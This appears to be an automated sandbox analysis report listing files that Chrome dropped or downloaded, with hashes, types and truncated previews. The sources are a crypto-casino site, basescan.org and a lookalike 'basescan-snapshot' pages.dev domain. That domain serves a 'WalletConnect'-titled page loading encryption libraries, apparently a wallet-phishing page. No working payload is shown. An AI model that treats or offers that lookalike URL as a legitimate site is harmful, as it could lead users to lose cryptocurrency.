                                                                                                                                                                                                                                              Preview:var f=Object.defineProperty,Y=Object.defineProperties;var M=Object.getOwnPropertyDescriptors;var i=Object.getOwnPropertySymbols;var h=Object.prototype.hasOwnProperty,p=Object.prototype.propertyIsEnumerable;var c=(e,t,r)=>t in e?f(e,t,{enumerable:!0,configurable:!0,writable:!0,value:r}):e[t]=r,a=(e,t)=>{for(var r in t||(t={}))h.call(t,r)&&c(e,r,t[r]);if(i)for(var r of i(t))p.call(t,r)&&c(e,r,t[r]);return e},g=(e,t)=>Y(e,M(t));import{e as T,D as s}from"./manifest-51a3674f.js";const b=()=>T.serverTime.getTime();function v(e){const t=new Date(e),r=o=>o<10?`0${o}`:o,n=r(t.getDate()),u=r(t.getMonth()+1),l=t.getFullYear(),m=r(t.getHours()),D=r(t.getMinutes());return`${u}/${n}/${l} ${m}:${D}`}function w(e){return e.toString().replace(/\B(?=(\d{3})+(?!\d))/g,",")}function $(e){return Array.from(g(a({},e),{length:Object.keys(e).length}))}function d(e,t){const r=Number(e||"0");return r>=1e10?new s(e).div(1e9).toFixed(t,s.ROUND_DOWN)+"B":r>=1e7?new s(e).div(1e6).toFixed(t,s.ROUND_DOWN)+"M":r>=1e3?
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2460
                                                                                                                                                                                                                                              Entropy (8bit):7.891143879325414
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:YNWQChwe3F6CnhxVO/387ZCAb96jENKEPsLG0ebRJqumHrisuWtoB87Qwo+2t6g:YN63F6AVM3c+ENKrLybRJqzuWCB87e+g
                                                                                                                                                                                                                                              MD5:260021EEE0C85E769DCD50B491957E8F
                                                                                                                                                                                                                                              SHA1:7F04929BCAE6A6813E0C6068109B4C3E29450F15
                                                                                                                                                                                                                                              SHA-256:87314B69EB303A63ED85DF1E9DDA0DC3F8D63A22CCC37CF679DE08C45BC5D039
                                                                                                                                                                                                                                              SHA-512:CAB777B9FE54C7D2BAA39797A0E8272274D4A2C80FCBBB4148CDF8483122B1902FF8F406BCFDAED36A197D7CB60DD1EED5886CF6DF2FE9BCEE0DB7F0D7220113
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/ADA.black.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../c...U...mZ....."b.xT-.`..\O.....g.....=...o!o.{......0."....hG...{.222V........DD. !.......$ .....DT.Hh..F$T...UH/...$ ..a...."....PE0......ip.. ..^.m.6_.m.m.m.vM.......effffffffffff..~....t.....UY....2@i.{>....:@TNl.y...Zf.p\T..%zfP.\.*.l.9..yt.]!..NP\.U.ue.......w.2....%.J.S..j?...'...7.....=.4.9".AV....g I......{.m{...@....m.m.l...,RX0%.^.....kT......bH.......!.(..`F....dD.....<J..........rM.xi.O...=. ..~=z...;7.$]0..)..*.X......0...Ql..I.._. ...yAW..c.~..-.X.\.[....I.5.<t..Zu.ofL...m.q..d.#.".......-.u.*.w..S.S$.LC].d...D.Dn........8.(........e.>....P>.f..pE.....Z(EZ.D:<....<T...............>c.3.X.....UPU..".;..i...Y....(0.... L<.9...q.\...d.f.D.4..Z5JpOVe.5....SK..L.TZZ"$....I..1...fZ.+.d{.[.8..Q.....bM..c$Io-^..qW..B.kH....C..).......,..gy..:..-.}..TQ^..X.}U....P.....U..Q........%q(...r...K.$...n:.!.#.H...S.b.l.N.......-C=M.L."...iU..&.t9...[......I^d..Q1....dL.0....3,........g..nf[.....I..\-(.z.YU....7EG&X..:^..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1313
                                                                                                                                                                                                                                              Entropy (8bit):4.783853316368474
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:t7rftujevOp9U2ooog5M5xwfsQHLfNhqZHfSUcUN1Ea0/yCm9WfABLnvmtD2yRH3:dfYevg9UlA5M5xq7HLVsZ/SHAQ7mDLvg
                                                                                                                                                                                                                                              MD5:79563CDB1EAF18E2671A03FAF66D1ACA
                                                                                                                                                                                                                                              SHA1:C0CC6F66BF441FAC5E63F4AE39C4F31156D0CF11
                                                                                                                                                                                                                                              SHA-256:9BB16661BAAAB74C7E7CEEA77EFF3FCAB5BE834B8A95EA740A12DEEEA29F0786
                                                                                                                                                                                                                                              SHA-512:D6B3F26ABD885F3FD15D7036F10BF6CB7E995DF18303A1CBEF31A9875D02C3264F7E61F04033610AD35197ED52815F6E29346217BB0448B806B68B8ACAF7C24F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/svg/brands/main.svg?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:<svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M186.384 171.561L243.497 138.588C246.518 136.842 248.397 133.591 248.397 130.099V64.1433C248.397 60.6566 246.518 57.4003 243.497 55.6543L186.384 22.6815C183.363 20.9356 179.605 20.9407 176.584 22.6815L119.47 55.6543C116.45 57.4003 114.571 60.6515 114.571 64.1433V182.001L74.5219 205.117L34.4733 182.001V135.752L74.5219 112.635L100.941 127.882V96.8601L79.4218 84.439C77.937 83.5839 76.2422 83.1334 74.5219 83.1334C72.8016 83.1334 71.1069 83.5839 69.6221 84.439L12.5034 117.417C9.48256 119.163 7.60352 122.414 7.60352 125.906V191.857C7.60352 195.343 9.48256 198.6 12.5034 200.346L69.617 233.323C72.6378 235.064 76.3907 235.064 79.4166 233.323L136.53 200.351C139.551 198.605 141.43 195.348 141.43 191.862V74.0044L142.152 73.5897L181.479 50.8876L221.527 74.0095V120.253L181.479 143.375L155.1 128.148V159.171L176.579 171.576C179.6 173.317 183.358 173.317 186.379 171.576L186.384 171.561Z" fill="u
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (780)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):781
                                                                                                                                                                                                                                              Entropy (8bit):5.187512677704716
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:UqvL0mDZcxMceG3LClbXsxwAXslw3Xs4lBXsiXO8Xs1q2eGuzZxScFGu3BDI0PHJ:900OeG3+axGfIqpRM2eJZxS2MUH87mJ1
                                                                                                                                                                                                                                              MD5:8789FF45B25DC550B300291CA63A44F4
                                                                                                                                                                                                                                              SHA1:ADABB5FAB84AE75BC4DD89E915097940A9C04B48
                                                                                                                                                                                                                                              SHA-256:76A6AD0A5A25E77AF10DB56BAC02026B397D31FBB88147AA0E8C91E0F28B160C
                                                                                                                                                                                                                                              SHA-512:0F0F07A2329B1B4D0B616D1F7B316BD595925BD66841D873F108807A8E7ED8B158D2149C99FE7578C4D27F6A88398E4BAF045055A47EFB5B3E674EABC9D473D2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{e as g}from"./manifest-aca455c4.js";function d(e){return e?e>9?e:"0"+e:"00"}function u(e,t=""){return t=t&&t+".",`${window.location.protocol}//${t}${g.host}${e}`}function f(e){return u(`#/gift_ticket/${e}`)}function p(e){const t=new Date(e),n=t.getFullYear(),r=String(t.getMonth()+1).padStart(2,"0"),o=String(t.getDate()).padStart(2,"0"),c=String(t.getHours()).padStart(2,"0"),a=String(t.getMinutes()).padStart(2,"0"),i=String(t.getSeconds()).padStart(2,"0"),s=t.getHours()>=12?"PM":"AM";return`${r}/${o}/${n}, ${c}:${a}:${i} ${s}`}function m(e,t){const n=e||"USD";return t?`/coin/${n}.rect.png`:`/coin/${n}.black.png`}function l(e,t){return Object.fromEntries(Object.entries(e).filter(([n,r])=>t?!!r&&!t.includes(n):!!r))}export{m as a,u as b,d as c,f as d,l as r,p as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (64703)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1269427
                                                                                                                                                                                                                                              Entropy (8bit):5.759504296653748
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:JGidqoQkzUeZ37sLXWSz+NJ8BCPaj15vKLcOr:zqzCUeZ37sjWS0JzfYOr
                                                                                                                                                                                                                                              MD5:29E38D0872A7FEF225C84E15E55E1BEE
                                                                                                                                                                                                                                              SHA1:8A33EF1C6666716FFD0DEDD32025BB437E71A234
                                                                                                                                                                                                                                              SHA-256:73E5C2AA477A00E269CC40B5615B097168C558E0450FB28F6BA8BFD190CDB032
                                                                                                                                                                                                                                              SHA-512:6F0D57CAEAA30DD2E756F7810FF9B3DD7E2451AED8610D107383A3A959C5F2F1C6E4F54C08BDBE39D27B2C63E4155184790E7CD4F1E67D1768C5F16985091B65
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/index-DD2Zk4iT.js
                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["assets/NoticeComment-DxlkXkhH.js","assets/_basePropertyOf-BhSQSS-6.js","assets/OriginalsGames-46WI0mge.js","assets/index-DH9MDtxd.js","assets/Contest-BCVAsTyf.js","assets/ContestList-BC0hkzon.js","assets/common-DVIU4ngr.js","assets/ContestRules-Zo7GUD_B.js","assets/Bingo.page-I1m2tVcx.js","assets/index-CMxvzQWG.js","assets/Favorite.page-DZKmwPgr.js","assets/GameEntryWrap-B0vD2mef.js","assets/Recent.page-CTN_-8od.js","assets/ThrowAndHighRolles-DADNM0eC.js","assets/index-TJYR_fED.js","assets/Block-LQQkMNS-.js","assets/discord-3fjpJq_P.js","assets/index-OFWIR-XG.js","assets/index-C-NOM3iv.js","assets/Update-CdjLVoC3.js","assets/Casino.page-BK1IC-Vp.js","assets/Providers.page-v7ZHXAmf.js","assets/Tag.page-zKV2ptps.js","assets/Themes.page-BSU31Xnu.js"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.(function(){const L=document.createElement("link").relList;if(L&&L.supports&&L.supports("modulepreload"))return;for(const H of document.querySelectorAll('link[rel="mod
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3394
                                                                                                                                                                                                                                              Entropy (8bit):7.7530171017488065
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:rGcsiy2VZvgbF2275c/HRE6uHsQbThU3SrCa:rGFMvghl75c/xx4bOG
                                                                                                                                                                                                                                              MD5:07D13F4F5E726EA27DBB3BC89C4E82AA
                                                                                                                                                                                                                                              SHA1:BD618EAE786900672485DE063E7C60112EEFF33F
                                                                                                                                                                                                                                              SHA-256:8416E00B7DA82F540D2CD282C8306D1B64251949EF4D311FB057670F843E941A
                                                                                                                                                                                                                                              SHA-512:E29969DB17E3D7BDFE0B5824E1D941774DBBE4A0A9E8EE0F65226922C0AE98DB9F9D3014C3C8E9783685482604AA4164DA65E871F0F026F09F998DCAC06DAD62
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@................... .................z...8iinf..........infe........av01.....infe........av01.....iprp....ipco....colrnclx...........av1C........ispe...........Z....pixi.........8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....av1C........pixi............ipma..........................iref........auxl..........mdat.....%.{,.2.....D..VF`.K.....e$.....%.{,...h@2..D.....Vh...L.T..c1.J...{..C..^......WZ..^...x..o{...+..G...dtL.s..b.......3.q......:...C....z5j.....7w'......PmW.......o...U/>t.#.....Z.Q..}..ZO...(.#+6.-..~.z....7K......P.j7`....?.!#...b=./,......};U.V...0!.&<....$|........P..G........;.v..<..i..`..C....|...m.P.c_.jGg.k..D....s..T.......8..C.~H].g2...$`6..<.H(w..s.[....!.z..b.Y...=..;.w"...n.|]H.;.`....}..+.....H..=...X.eQ.......z.._..9>K..z..GDFL.H.....4.a.....g.[NGY....?....3.T^...@M..0...M..........ama.{.G.*...s..,..Q.T_zZ.b
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 200x267, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):17685
                                                                                                                                                                                                                                              Entropy (8bit):7.87901791672357
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:hYNg7/LaWsPJsNNorDVUDLTVxiWh9PyT8dtdYw7c5ZPsSjf1:hYy/Or8fVVh9P88jRK2Sjf1
                                                                                                                                                                                                                                              MD5:A64EBFC026A702DC28B4ED1F84985C3A
                                                                                                                                                                                                                                              SHA1:DEF4C7C38DDC13D94AC306B249767EF8CDF49F47
                                                                                                                                                                                                                                              SHA-256:BE032DB0A206EAEB1731F323DC35FFB9E5A6BA5954C450595B3648849E543FC6
                                                                                                                                                                                                                                              SHA-512:AF3B7AF649D2719DDE3EE8AF0FE16FC2BA36ED9944337E34B91297CEFD094562A1D180D3D5A4F2E0A1099669420FC2A53DC4B3DE8EDE12D648B17CFEA8F90783
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 388 x 247, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):28160
                                                                                                                                                                                                                                              Entropy (8bit):7.850882817105642
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:tFQamrWZxb33+9WnhMswxdOMvjo2e+cGtJlHc:fr3kWys4QM7Lvftjc
                                                                                                                                                                                                                                              MD5:BE240262B3F48FD75FD3814FB62E9E92
                                                                                                                                                                                                                                              SHA1:BB47A2A7FB7D6F6EF3188A24E509B67A743510DE
                                                                                                                                                                                                                                              SHA-256:9983C8C43F2DB0187D7BB6270C8DE276900E0EC2322EBC7FDE4FD19FEBFEF6A1
                                                                                                                                                                                                                                              SHA-512:BD29FD350EF255EFFF61A2945FA3E4DCCA91078A8B3D7A772D7F8205176DF58F71B24B583A602BE180AE4D44AA9EB54F4FDEA0729FAAF130F7126EC5B0EF8561
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............*..:....PLTE..p..s..s.~^..f..p..p..h..jnqf..l..a..p..n..r..k..o..h..j..m..`..r..p..o..nhh[..k~z[{vZxsY..o..c..m^bZ...............W_`......|..........r..q..q..h..r..p..r...?FG@GH=BC;DE=AB;DD:@B<CD:BC;AB<EE:BB<AC:BB>EF9?A:AA<CD9?@9AB;BC;AB:AB;CE9?@;BB:DD9@B8=A;BB:AB:BB:AB;BC9AB;BC=BE:AA9@A;CC9?B:BC:AB8@A;BC9AB:BB9@B;AB:AB:AA:AC9@A:AB;BD:@A:BC:AB:AB;@B:BB<AD:@A;CC:BC:BB:AB:AB:AB:AB9@A8??8?@6=>8??5;=6<=4:;4:;BFI..k..n..e..^..l\_V..buqX..nroW..r..s..sY[N..`.z\..g..d..h..h..g..i..j..m..a..q..q..a..j..k..m..q..o..j..o..p{vZmjU..qigS..lfeR..cTWL..f.}]..j..e..b..j..h..lomU..n..f..p..rWZN.._VXL..n..g..`wrX..hRVKtoX.....l.....................rz{.................................`d]......u~.qyz..................jstw........mvw......~.......................*.-l....tRNS...9V..RP'o3.|.`j>MI.....-s>BE._.8~...B..;....+.Dc............... !#$%')+,,.00124579:<>>?@ABCDEFGHIKMNOPRRSUVWXZZ[\]^acea^\YWVTRP#..ZT.<bH.K...Bi[.s}{kyw.J..e.......bT.Z.`.R.t..y...P....HmN..i.Wnq..|.E
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):79002
                                                                                                                                                                                                                                              Entropy (8bit):5.180414925767399
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:TyFfWZ8lEMcwzy4iKTefCnZZNhYApYRRq3xTyWshEkmZdJr3SB/EQThp3U:2t5lLIjKC4UI3xTyWgmFQBhp3U
                                                                                                                                                                                                                                              MD5:C3C2174F50DD250FAA2475F149E88D1C
                                                                                                                                                                                                                                              SHA1:B96D03CC4D1B6BE27F9635491D72D37A8BCC831C
                                                                                                                                                                                                                                              SHA-256:4A3BFCA5C1CFE04DE9B767BB637346D08C941E74AEBF8C1B13B49F4D4A360F8C
                                                                                                                                                                                                                                              SHA-512:B4824A066F96FE8D65B561401A03FAC5DD6BAC9FF6AC4ACE0B2A8B7E9F74EADDCF1D148730B896A68E02CD180731F0C6327FB8F926B3CC3AD9E0BB6BD879FD2C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/index-CrXVjlJA.css
                                                                                                                                                                                                                                              Preview:*,:before,:after{box-sizing:border-box;border-width:0;border-style:solid;border-color:currentColor}:before,:after{--tw-content: ""}html,:host{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:ui-sans-serif,system-ui,sans-serif,"Apple Color Emoji","Segoe UI Emoji",Segoe UI Symbol,"Noto Color Emoji";font-feature-settings:normal;font-variation-settings:normal;-webkit-tap-highlight-color:transparent}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,samp,pre{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-feature-settings:normal;font-variation-settings:normal;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;posit
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2315
                                                                                                                                                                                                                                              Entropy (8bit):5.06307085126787
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:t4Lt7AtZYjjLNTQdNt5LFUdNt8LhH7dNtf3LXVqdNtKL3HXqdNtdLcLdNtQL0gdw:+pAvYBTQHuORV3BqIbq78C5VGck
                                                                                                                                                                                                                                              MD5:FF5F58512BDA38BF652FBCAB70E49C7B
                                                                                                                                                                                                                                              SHA1:71D6167817AF2C73F6C669BB649A1B3B1FE31D6E
                                                                                                                                                                                                                                              SHA-256:92E50CEF8222EF06AFFC061AB3BF864B4DA4D6545EA5EA72D046A37B2569BEFB
                                                                                                                                                                                                                                              SHA-512:519715E077BB02B4618435360DF5769E18EAEECCD4737BA85A346E67582C442B79575ECC522DD6D56E386483AE31CC13F650910B7EF08557EBBDBCABEC4B5EA8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/main/loadingblock.svg
                                                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="62" height="62" preserveAspectRatio="xMidYMid" style="background: none;"><rect id="backgroundrect" width="100%" height="100%" x="0" y="0" fill="none" stroke="none"/><g class="currentLayer" style=""><title>Layer 1</title><rect x="0" y="0" width="20" height="20" fill="#1d3f72" id="svg_1" class="">.. <animate attributeName="fill" values="#5699d2;#1d3f72;#1d3f72" keyTimes="0;0.125;1" dur="1.6s" repeatCount="indefinite" begin="0s" calcMode="discrete"/>..</rect><rect x="21" y="0" width="20" height="20" fill="#1d3f72" id="svg_2" class="">.. <animate attributeName="fill" values="#5699d2;#1d3f72;#1d3f72" keyTimes="0;0.125;1" dur="1.6s" repeatCount="indefinite" begin="0.2s" calcMode="discrete"/>..</rect><rect x="42" y="0" width="20" height="20" fill="#1d3f72" id="svg_3" class="">.. <animate attributeName="fill" values="#5699d2;#1d3f72;#1d3f72" keyTimes="0;0.125;1" dur="1.6s" repeatCount="indefinite" begi
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):252
                                                                                                                                                                                                                                              Entropy (8bit):5.040900342723824
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:5zldoBvSIiPXEdv0IXq/llS+M+aD5X5yTMEfs1vavi8Dzv:Br4KIqu09SzJNc/ss3D
                                                                                                                                                                                                                                              MD5:8CD96C293A6ACAF84712D44761B9B6B8
                                                                                                                                                                                                                                              SHA1:516A9580846A81C29D4A99372B13E98DA8A335BE
                                                                                                                                                                                                                                              SHA-256:8D3B2E8C54FAFFDE1000625517901EED0F3B85841D499A7FF66DB6EDDBD28A18
                                                                                                                                                                                                                                              SHA-512:71DD80783D1F0ED5CA65461D50850055A9DCE3A21172A338638CB236B66E3CF90DA42973BCB24D5F83972352EF49AD56D4C3927FA8D68BE2D12E58F1094ED246
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{t as o}from"./toNumber-2a781ab2.js";var i=1/0,f=17976931348623157e292;function I(r){if(!r)return r===0?r:0;if(r=o(r),r===i||r===-i){var t=r<0?-1:1;return t*f}return r===r?r:0}function N(r){var t=I(r),n=t%1;return t===t?n?t-n:t:0}export{N as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (9067), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9166
                                                                                                                                                                                                                                              Entropy (8bit):5.096624346064397
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:06IMH3HEG9JVwkHg4LyAal318/NYusfkApXMdgmkpj:0y0G9J1zG3eFYP/XMmmkpj
                                                                                                                                                                                                                                              MD5:722242F7B6E0FA3B8D25070388A5C826
                                                                                                                                                                                                                                              SHA1:D62DCB0905E038E69FF24AB9EEF9E3306D45535E
                                                                                                                                                                                                                                              SHA-256:21708DB6D7F8E20387183D7358648065DC45F7D635370FEDB24DF591F68F1E6B
                                                                                                                                                                                                                                              SHA-512:29264704D320B74A88F030D0B6586F0E27D03F7F8CAC684A862C0CD18D3359DA09553DD78A67C47371C7E158E3964A6E33FF71F5545326612003DCF13854FDE2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
